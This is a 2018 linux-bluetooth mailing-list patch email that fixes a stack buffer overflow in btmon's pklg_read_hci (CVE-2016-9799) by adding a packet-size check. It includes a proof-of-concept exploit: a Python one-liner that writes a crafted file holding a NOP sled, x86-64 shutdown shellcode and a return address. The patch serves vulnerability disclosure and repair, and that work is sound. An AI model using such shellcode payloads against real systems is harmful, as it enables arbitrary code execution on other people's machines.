From: Matias Karhumaa <matias.karhumaa@gmail.com>
To: linux-bluetooth@vger.kernel.org
Subject: [PATCH 05/12] btmon: fix stack buffer overflow
Date: Tue, 16 Oct 2018 23:21:50 +0300 [thread overview]
Message-ID: <20181016202150.GA85006@Matias-MacBook-Air.local> (raw)
Arbitrary code execution vulnerability was discovered in btmon.
pklg_read_hci function read from file attacker controllable
amount of data which caused stack buffer overflow.
Fixes old and previously unfixed CVE-2016-9799.
Initially this was reported by op7ic:
https://www.spinics.net/lists/linux-bluetooth/msg68898.html
Later this was re-discovered by fuzzing btmon with AFL.
Proof-of-concept exploit that shutowns the machine:
$ python -c 'print "\x00\x00\x0c\x10"+ "\x90"*609 +"\x48\x31\xc0\x48\x31\xd2\x50\x6a\x77\x66\x68\x6e\x6f\x48\x89\xe3\x50\x66\x68\x2d\x68\x48\x89\xe1\x50\x49\xb8\x2f\x73\x62\x69\x6e\x2f\x2f\x2f\x49\xba\x73\x68\x75\x74\x64\x6f\x77\x6e\x41\x52\x41\x50\x48\x89\xe7\x52\x53\x51\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"+ "\x90"*847 +"\xb0\xda\xff\xff\xff\x7f\x00\x00"' > exploit
$ ./btmon -r exploit
Proof of concept requires that ASLR is disabled and following CFLAGS are
set: -fno-stack-protector -zexecstack
---
src/shared/btsnoop.c | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/src/shared/btsnoop.c b/src/shared/btsnoop.c
index 255775e0d..f367aff55 100644
--- a/src/shared/btsnoop.c
+++ b/src/shared/btsnoop.c
@@ -410,6 +410,11 @@ static bool pklg_read_hci(struct btsnoop *btsnoop, struct timeval *tv,
tv->tv_usec = ts & 0xffffffff;
}
+ if (toread > BTSNOOP_MAX_PACKET_SIZE) {
+ btsnoop->aborted = true;
+ return false;
+ }
+
switch (pkt.type) {
case 0x00:
*index = 0x0000;
--
2.17.1
reply other threads:[~2018-10-16 20:18 UTC|newest]
Thread overview: [no followups] expand[flat|nested] mbox.gz Atom feed
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20181016202150.GA85006@Matias-MacBook-Air.local \
--to=matias.karhumaa@gmail.com \
--cc=linux-bluetooth@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).